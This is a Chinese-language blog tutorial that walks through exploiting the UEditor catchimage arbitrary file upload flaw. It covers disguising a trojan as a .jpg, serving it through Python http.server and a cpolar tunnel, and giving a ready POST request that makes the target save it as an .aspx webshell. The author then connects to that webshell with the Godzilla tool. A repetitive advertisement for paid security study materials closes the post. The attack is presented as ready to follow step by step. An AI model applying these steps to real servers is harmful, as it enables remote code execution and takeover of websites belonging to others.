1.做一个木马文件出来,后缀是.jpg,样子如图
2.然后在木马所在的文件夹打开cmd,可以直接在文件夹上面的地址栏里面直接输入cmd然后回车就行,因为Python的简易服务器就是以你执行命令所在的文件夹为根目录的,所以必须在这个文件夹。
3.运行命令,9090是端口,记的不要用8080,不然burp内置浏览器会出问题的。
Python -m http.server 9090
4.然后可以在浏览器验证一下,出现跟下图一样就成功了。链接:http://127.0.0.1:9090/
5.然后下载一个cpolar,安装直接一直下一步就行,这里就不贴图了,要注册账号,后面要用的。官网链接:cpolar官网-安全的内网穿透工具 | 无需公网ip | 远程访问 | 搭建网站
6.安装完成后访问http://127.0.0.1:9200/,用上一步注册的账号登录即可,登录之后直接在隧道管理里面创建隧道即可,端口要和你启动Python服务器的端口一致,其他都默认就行。
7.完成后在状态-在线隧道列表里面就能看到了,随便访问一个公网地址就行了
8.验证截图
9.到这工作已经完成大半了,之前说过验证这个漏洞最简单的方法就是发包,数据包我直接借用如下链接的大佬文章里面的。链接:UEditor 任意文件上传漏洞
POST /Utility/UEditor/index?action=catchimage HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="100", "Chromium";v="100", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
source[]=http://替换为自己服务器开启http服务的URL地址/666.jpg?.aspx
10.然后就是紧张刺激的发包传马了,哦,对,还没说怎么初步检验是否存在漏洞,拼接url:http://ip:port/UEditor/net/controller.ashx?action=catchimage。出现下图,证明可能存在漏洞。
11.把source[]=后面的链接换成上面搭好的服务器的公网访问地址,然后后面加上?.aspx,然后如图的返回包就是上传成功了,框起来的部分就是地址,拼接之后大概是这样的链接:http://ip:port/Utility/UEditor/upload/image/22222222/22222222222222222222.aspx
12.然后用我最爱的webshell工具哥斯拉链接一下,bingo,链接成功!
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
**](https://bbs.csdn.net/topics/618653875)
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!